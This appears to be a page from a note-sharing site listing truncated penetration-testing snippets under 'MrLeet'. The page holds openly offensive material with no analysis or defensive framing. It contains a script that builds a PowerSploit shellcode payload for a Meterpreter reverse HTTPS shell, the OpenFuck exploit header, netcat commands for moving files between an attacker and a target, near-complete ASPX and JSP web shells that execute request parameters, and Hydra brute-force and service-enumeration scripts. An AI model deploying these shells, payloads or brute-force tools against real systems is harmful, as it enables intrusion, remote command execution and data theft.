Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

#!/bin/bash

# meterpreter ip & port
lhost=10.10.14.xx
lport=443

echo " * Writing Payload"
cat /usr/share/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload

echo " * Prepping Comman...


Score: 0


/*
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/

#include <arpa/inet.h>
#include &...


Score: 0


Push from Client to Listener
On target machine: nc -lp [local port] > [outfile]
On attacker machine: nc -w3 [listener IP] [listener port] < [infile]
Send [infile] to listener, where it will be stored in [outfile]

Pull from Listener to Client
On target machine: nc -lp [local port] < [infile]
On attacker machine: ...


Score: 0


<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%=
Process.Start(
new ProcessStartInfo("cmd" ,"/c " + Request["c"] )
{
UseShellExecute = false,
RedirectStandardOutput = true
}
).StandardOutput.ReadToEnd()
%>
...


Score: 0


<pre>
<%@ page import="java.util.*,java.io.*,java.lang.*"%>
<%
String cmd = request.getParameter("cmd");
Process a =( new java.lang.ProcessBuilder(cmd.toString().split("\\s"))).start();
InputStream in = a.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine()...


Score: 0


#!/usr/bin/env python
import subprocess
import sys

if len(sys.argv) != 3:
print "Usage: sshrecon.py <ip address> <port>"
sys.exit(0)

ip_address = sys.argv[1].strip()
port = sys.argv[2].strip()

print "INFO: Performing hydra ssh scan against " + ip_address
HYDRA = "hydra -L wordlists/userli...


Score: 0


#!/usr/bin/env python
import subprocess
import sys

if len(sys.argv) != 2:
print "Usage: snmprecon.py <ip address>"
sys.exit(0)

snmpdetect = 0
ip_address = sys.argv[1]

ONESIXONESCAN = "onesixtyone %s" % (ip_address)
results = subprocess.check_output(ONESIXONESCAN, shell=True).strip()

if results != ...


Score: 0


#!/usr/bin/python
import socket
import sys
import subprocess

if len(sys.argv) != 2:
print "Usage: smtprecon.py <ip address>"
sys.exit(0)

#SMTPSCAN = "nmap -vv -sV -Pn -p 25,465,587 --script=smtp-vuln* %s" % (sys.argv[1])
#results = subprocess.check_output(SMTPSCAN, shell=True)

#f = open("results...


Score: 0


#!/usr/bin/perl -w
# smtp-user-enum - Brute Force Usernames via EXPN/VRFY/RCPT TO
# Copyright (C) 2008 pentestmonkey@pentestmonkey.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program i...


Score: 0


#!/usr/bin/python
import sys
import subprocess

if len(sys.argv) != 2:
print "Usage: smbrecon.py <ip address>"
sys.exit(0)

ip = sys.argv[1]
NBTSCAN = "python samrdump.py %s" % (ip)
nbtresults = subprocess.check_output(NBTSCAN, shell=True)
if ("Connection refused" not in nbtresults) and ("...


Score: 0